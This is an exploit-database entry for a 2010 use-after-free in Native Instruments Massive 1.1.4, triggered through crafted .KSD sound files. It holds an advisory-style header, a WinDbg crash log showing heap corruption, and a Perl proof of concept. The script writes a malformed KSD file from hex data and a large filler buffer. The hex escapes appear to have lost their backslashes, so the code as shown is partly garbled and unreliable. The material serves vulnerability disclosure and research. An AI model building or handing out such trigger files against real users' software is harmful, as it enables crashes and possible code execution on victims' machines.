[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Native Instruments Massive 1.1.4 KSD File Handling Use-After-Free Vulnerability
# Published : 2010-11-20
# Author : LiquidWorm
# Previous Title : Safari 5.02 Stack Overflow Denial of Service
# Next Title : Native Instruments Traktor Pro 1.2.6 Stack-based Buffer Overflow Vulnerability
#!/usr/bin/perl
#
#
# Title: Native Instruments Massive 1.1.4 KSD File Handling Use-After-Free Vulnerability
#
#
# Vendor: Native Instruments GmbH
# Product web page: http://www.native-instruments.com
# Affected version: 1.1.4 (R1901)
#
# Summary: MASSIVE is a sonic monster ? the ultimate synth for basses and leads. The
# analog concept belies the contemporary, cutting-edge sound it generates. The high-end
# engine delivers pure quality, lending an undeniable virtue and character to even the
# most saturated of sounds. The interface is clearly laid out and easy to use, ensuring
# you will have MASSIVE generating earth-shuddering sounds from the very first note.
#
# Desc: Massive suffers from a use-after-free error when parsing sound files (.KSD)
# resulting in a crash. The user input is not properly sanitized which may give the
# attackers the possibility for an arbitrary code execution on the affected system.
# Failure of exploitation may result in a denial of service scenario.
#
# Tested on: Microsoft Windows XP Professional SP3 (English)
#
#
#-------------------------------------------------------------------------------------#
#
# Heap corruption detected at 06B7F6E8
# HEAP[Massive.exe]: HEAP: Free Heap block 6b7f6e0 modified at 6b7f6f0 after it was freed
# (960.dc8): Break instruction exception - code 80000003 (first chance)
# eax=06b7f6e0 ebx=00000000 ecx=7c91e544 edx=098fee78 esi=06b7f6e0 edi=0007a7b0
# eip=7c90120e esp=098ff078 ebp=098ff07c iopl=0 nv up ei pl nz na po nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
# ntdll!DbgBreakPoint:
# 7c90120e cc int 3
# 0:010> g
# (960.dc8): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=feeefeee ebx=0000f4e1 ecx=000063a8 edx=098fee78 esi=06b7f6e0 edi=06be1000
# eip=7c902c53 esp=098ff074 ebp=098ff2a4 iopl=0 nv up ei pl nz na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
# ntdll!RtlFillMemoryUlong+0x10:
# 7c902c53 f3ab rep stos dword ptr es:[edi]
# 0:010> g
# (960.dc8): C++ EH exception - code e06d7363 (first chance)
# Heap corruption detected at 06B80FA8
# Heap corruption detected at 06B80F18
# HEAP[Massive.exe]: HEAP: Free Heap block 6b80f10 modified at 6b80f20 after it was freed
# (960.ee8): Break instruction exception - code 80000003 (first chance)
# eax=06b80f10 ebx=04180000 ecx=7c91e544 edx=0012e8a4 esi=06b80f10 edi=06b80fa0
# eip=7c90120e esp=0012eaa4 ebp=0012eaa8 iopl=0 nv up ei pl nz na po nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202
# ntdll!DbgBreakPoint:
# 7c90120e cc int 3
#
#-------------------------------------------------------------------------------------#
#
#
# Vulnerabilty discovered by: Gjoko 'LiquidWorm' Krstic
# liquidworm gmail
# Zero Science Lab
# http://www.zeroscience.mk
#
#
# Advisory ID: ZSL-2010-4980
# Advisory ID: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4980.php
#
# 04.11.2010
#
use strict;
my $file = "massive_sound.ksd";
my $head = "x2Dx69x6Ex2Dx02x00x00x00x23x4Ex49x23x43x53x23x44x6Fx63x75x6Dx65".
"x6Ex74x23x23x4Ex49x23x53x6Fx75x6Ex64x53x68x65x6Cx6Cx23x53x6Fx75".
"x6Ex64x23x00x00x00x00x00x00x00x00x00x00x00x31x01x00x00x61x74x61".
"x64x02x00x00x00x64x6Ex73x73x62x69x6Cx7Ax16x00x00x00x10x00x00x00".
"x78xDAx63x62x60x60xD0xF5xF4xD3x4DxF4xCDxF4x03x32x19x00x13x2Fx02".
"x59x61x74x61x64x02x00x00x00x6Fx66x6Ex69x62x69x6Cx7AxC0x02x00x00".
"xCBx05x00x00x78xDAx75x54xC9x6ExDBx30x10x75x0FxBDxF8x2Bx08xDEx6B".
"xB9x29x0AxF4x20x29x90xB7xC4xA8xEDx04x91xD3xF6x16x30xD2x44x22x4A".
"x91x06x49x39xD5xD7xF5xD7x3Ax94x4Cx59x0Ex9Ax13x67x9Fx37x0Bx87x6C".
"xB6xBFx3Ex8Cx46xA3xBFx1Fx47xA3xF0xFAx4Fx25xC8x11xB4xE1x4Ax46xF4".
"xF3x64x4Ax09xC8x4CxE5x5Cx16x11x7DxDCxAFx3Ex7DxA3xC4x58x26x73x26".
"x94x84x88x4Ax45xC9x75x3Cx0Ex77xEBxA7xC5xDDxFCxE9x76x99x2Cx96x0F".
"x24x57xD9xD3x41x30xFBxA2x74x15x51x8CxE1x04x7DxD4x2FxD3xAFx9DxE4".
"x55x73x0Bx07xADx2Cx64x16x72x67x18x8FxC7x84x84x4Ex27x59x05xB1x05".
"x63xC3xA0x67x7BxA5x6Dx0Ex10x67xAAx9Ax48x66xF9x11x3Ex71x69xACxAE".
"x2Bx90xD6x4Cx52x55xCBx3Cx2Dx41x88x89x71x64xE7xDFx7AxF4xFEx19xB3".
"x50x28xDDxC4xC8xB4x6Ex9Dx51x2Fx6Ex0DxB9x7Cx51x31x12x48x62xAAx4A".
"xC9xC4x5AxDDx09x50xB4xE0x06x2Bx6Cx76x0Ex57x18x0Cx39x6Fx91xD4xB6".
"x54x1Ax95x27xC2xCBx7Fx80xCCx91xDDxB5xD0xC9xFAx0Cx3Dx0Cx4Ex2Ax6F".
"x39x63xF2x77x5BxF8x96x19xE3x8Cx57x2CxB3x88x8FxCCx95xB4x2DxEAxDE".
"xC2xBBxCCx11x29x6Ax30xABxA7xBCx66x9Dx29x89xE2xF6xF1xB2x7BxADx0E".
"xE4x01x81xB8xE9x4Ex69x30x08x23x94x26x49x44x7Fx96x38x22xAFx08x83".
"xB7x8Dx08xF7x90x95x92x67x4Cx5Cx36x07x8Ex3Cx83x3DxF6xDCxC5x38x97".
"x38xC8xF0x1Dx9Ax0Dx6Bx54x6DxCFxA2x3Ex96x83x05xDAx72x30x64x7ExFF".
"xF8x68x58x01xEDx16x6Dx14xCBxF7xBCxEAx98x2Dx54x67xCDxAExAExD6xF2".
"x50x5BxE3xB9xBBxDAx76xECxD5x20xE7xBDxA8x0Bx5Cx15xCFxF7x12xDFxDF".
"x30x38xF1xDEx21xB8xF0x08x83xFFx54x1Bx6Ex6BxE3x25x64x0FxD5x41xE1".
"xB7xB9x9AxBAx55xF6x8DxEFxCBx77xCDxD8x32x21xC0x0ExC7x3Ex00xE8x3B".
"x96xE4x39x77xDBx41xC9x2CxA2x0Bx5Ex70xCBx04x25xF3x88x62x67x32x30".
"x06x72x4Ax16x11x4Dx1Bx69x4BxB0x3Cx1Bx86xE0xD5xB3x6Ex83xCCx34x2F".
"x4AxDBx86xC0x71xE6xADx3FxEExA9x51x92xE1x24x9CxFFx2Dx1Ax50xB2x44".
"x50x80x09x04xC6x21xABx88xEEx14x37x0Dx25x37x18x5FxBDxA0xE1x6Dx44".
"xF7x25x97x83x1Cx09xCEx26xABxF1x7FxE3x77x76x99x16x90xB1x06x77xA8".
"xCDxB5xCCx4AxD5xD2x98x6Ex03xACx43xBAx51xB2x20x0Fx20x80x19x68x33".
"xA6xAFx00x87x60xC5x85x05x4DxB6x2Ax1Fx44xBFx01xD9x15x90x54xCFx1C".
"x1Bx14x2Cx05xDEx07xADx5CxE3xDBx0CxC9x11x0Bx28x98xCExE1xB2x6Ex48".
"x79x81x07xA1xD6x70xB1x66x83xADxC6x6Fx98x9FxD9x14xC7x36x30xDDxD7".
"x12x71xF7xABx3Ex98xABx13x85x41x77x0FxDEx5Cx06x86x6AxFEx5CxDBxF3".
"x0Fx3Cx32x51x43x3CxC3xFBx13x06x1Dx7Dx0AxF8xC6xF4x5DxD7xB4xBBx5A".
"xEFxFBxF6x50xC2xE0xE2xECxC6xE3x7Fx0ExC6xBCx49x61x74x61x64x02x00".
"x00x00x74x73x72x70x62x69x6Cx7AxC5x03x00x00xF2x16x00x00x78xDAxED".
"x58x49x4Fx14x41x14xAEx9Ex61x11x0Cx08x2AxA2x88x38x2Ax2AxE0x0Ax26".
"x84x20x54xF7xA0x02x46x41x20xC1x10xF7x61x18x1Cx64x10x84x11x11xB7".
"x71x19x4Cx5Cx12x8FxE2x2Fx30xE8x0FxF0x46x87x93x07x0Fx1Ex8Dx7AxF1".
"xE2x41x2Ex9AxA8xF1x24xF6x52x3Dx5Dx55xD3xFDxA8x0Ex31xF1x60x85xA2".
"xDExD4xF7xBDx57xDFxBCx7Ax35xBDx14x23xBDx25x64xC4x34xEAxB3xDAxA2".
"xD9x6FxB1x39x97x9Ax97x49x47x8BxCFx29xD8xB6xC3xD8xE6xF1x6Bx52x6B".
"x27x92x86x4FxFBxA3x42x17x0ExB3x9ExC9x51xA3x32x1BxFBx9Bx16x23x9B".
"xF8xFBxB5x71x52xFExD5x5FxAFx8Dx51xDCxFEx3Ex64x74xA4xB4x01x3Ax44".
"x9AxBBxEFx50xEDxFAx25xC4x75x88xADx36xC8xF6x1Ex00xB9x03xF1xF2xF4".
"xF9xC4x4Fx73x7Fx12x0Fx31xB5x2ExDFx91xA4xF5x0Cx49x42xC5xC4xF6xE9".
"x4CxD2x33x89x23x36xBBxE5xA4x90x9Ex90x25xE2xD4x40x46xAFxB6xA7xC5".
"x5CxC8xA9x92x41x26xD1x6Cx7Fx2F";
my $ound = "x41" x (6 * 10000 + (120000 / 30) + (2 * 100) + 50 + (2-1));
my $feet = "x32xFDx1DxDCx3ExFBxA8x7Dx90xCCx5DxD6x63x48x52x6Ax66x99xD6x8Fx8D".
"x85xABx03xC7x87x63xB9x96xDDx31x10x0Fx47x75xA4x79x20x16x8Fx8Cx06".
"xAAx29xBBx26x4BxB7x7Bx02x6Dx03x13xC6x6Cx24xD2xD7x1Bx0Ax0FxEAxB3".
"xC1x78x5CxB3xB2x35xABx2Bx12x8Bx84xC6x22x7ExB2x74x77x77x65xD0x94".
"xA2xE0xFCx94xA0x05xADx99x02x90x9Fx2Ax30xD3x4ExCCxA6x66x66x4DxA2".
"xEDx92xE3xE6xC2x13x6Dx2Bx97x77xF1x91x31x8Fx93xB3x1Cx91xDCx97x52".
"x0ExB6xFExF4xC8x79xCEx62xD2x89xB6x95xEFxDDx65x85xB3xFEx74x62x01".
"xB2x6Bx47x48xFFx4AxEFx62x56x79x77x59x2DxAAxBFx88xD6x2Fx31xDFx43".
"xD1x6Ax37x10x24x7Bx2Dx1Bx44x34xD2xF8x00xAFx31xACxBExFExCFxD8xC8".
"x92xB4x89xFFxEAx8BxCBxDBx2Cx2Ax6Fx0Bx22x67xC6x5Dx52xD7xABx32x99".
"x77x2BxA7xE3x3Fx9BxCExE1x5CxCAx92x83x72x01x57x88x5Bx45x25x6DxD3".
"xCDx0Cx6ExC7x21x87x0Ax51x62xA5x91x4Ex2FxA1xABx44x89x3Bx8CxD0x0B".
"x40xE3x6BxF7xF1xDCx11x5CxC4xE5xA8x94x2Ex12xCBx51x54xC2x06x96xA8".
"xBAx12xCBx44x23x6Ex14x25x06x9Cx88xAFxDFx1CxC5x66xAExBFx57x7CxC4".
"xC6xB1x44x25xD6x25x84x27xABx3Fx9Ex93xBAxB7xA3xAExB5xA3xAAx5Ax5D".
"xAAx8Ax8Fx29x32x9Bx58x8CxF8xCBx02xF5x9BxABxB8x89xBEx27x4Ax4Cx5A".
"xC4xF9xCEx29x45xEDx79xE9x4Ax9Cx12x8Dx78x5Fx34xB1xDBxA9x88xFAx15".
"x75xD6x8Dx58xEBx76x3DxF0x93x9Cx24xCCx33x2CxFDxD6xFFxA7x6Bx1CxC7".
"x99x5Cx52xEBx3Cx45x44xDCxA1x7Ax31x33xD3x68x8Dx12x13xF7x36x1FxD7".
"x1Ax59xDAx1Dx3Ex97x2Cx7Cx97x2Dx24x65x0ExA1x27x4Dx2CxE5x16xABxA7".
"x0AxB3x70x22xEDx47x80xC5x6FxBAxDEx67xFAx3CxCCx4BxD4x81xFExDFxB8".
"x5Cx49x1ExFFx88x9FxEFx1FxD2xE3x07x6BxE8x04x5Cx62x67x60xB8x17x86".
"xFBx61xF8x82x05xC7xE4xCCxA6x8Ex92x0Fx73x2Cx7Cx11xF6x1Ex85xE1x71".
"x18x9Ex84x8Fx00x9CxB4x93x70xECxB3x30x1Cx86xE1xF3x30x3Cx08x27x6D".
"x18xF6x1Ex83xE1x2Bx30x7Cx6Dx29x49x3Bx05xC7x3Ex07xC3x7Dx30x1Cx85".
"xE1x18x9CxB4x11xD8x3Bx0ExC3x13x30x7Cx7Dx29x49x3BxEDx14xBBxF5x53".
"xBDx6Cx3Cx10xA0x10xBCx74x04x86x07x60x78x08x4ExDAx25xD8xFBx32x0C".
"x5Fx75x82xBFx74xD6xC9xC6x63x0BxBAxE1x9Cx34xEBx0Dx4Cx06x18x1BxF3".
"xB7x24x2CxDCx04x2Bx6BxB6x00xEAx01xF0x9Dx76xF1x2Ex38xC0xF2xEAx4D".
"x6Dx92xF5xD0x0Fx6Bx92x61x4Dx07x60x4Dx2Dx82x9AxF6x93x7Cx89x69x52".
"x60x4Dx07x61x4DxADx82x9Ax1Ax3Cx69x0AxC2x9Ax0ExC1x9Ax0Ex0Bx6Ax6A".
"xE4x34xF9xA8xB7x8Fx5Ex6Dx7Dx95x2Cx87x1BxD1xD2xE4x3Cx2ExE4xEEx58".
"x77x8AxDEx55xEFx12x25xEEx16x25xEEx61xDEx50x49xDCx43x0Ex1FxE1xE9".
"xF4x3Ax99x17xBFx57x74xA9x6Ax51x62x8Dx28x71x9FxA3x78x93xFDx55x3B".
"xCFx7Fx00x0Fx27x6Fx13x61x74x61x64x02x00x00x00x67x70x74x63x62x69".
"x6Cx7Ax0Cx00x00x00x04x00x00x00x78xDAx8Bx0CxF1x75x05x00x03x43x01".
"x40x61x74x61x64x02x00x00x00x44x4Ex53x53x62x69x6Cx7Ax16x00x00x00".
"x10x00x00x00x78xDAx63x62x60x60xD0xF5xF4xD3x4DxF4xCDxF4x03x32x19".
"x00x13x2Fx02x59";
print "nn[*] Creating $file file...n";
open KSD, ">./$file" || die "nCan't open $file: $!";
print KSD $head.$ound.$feet;
print "n[.] File successfully buffered!nn";
close KSD;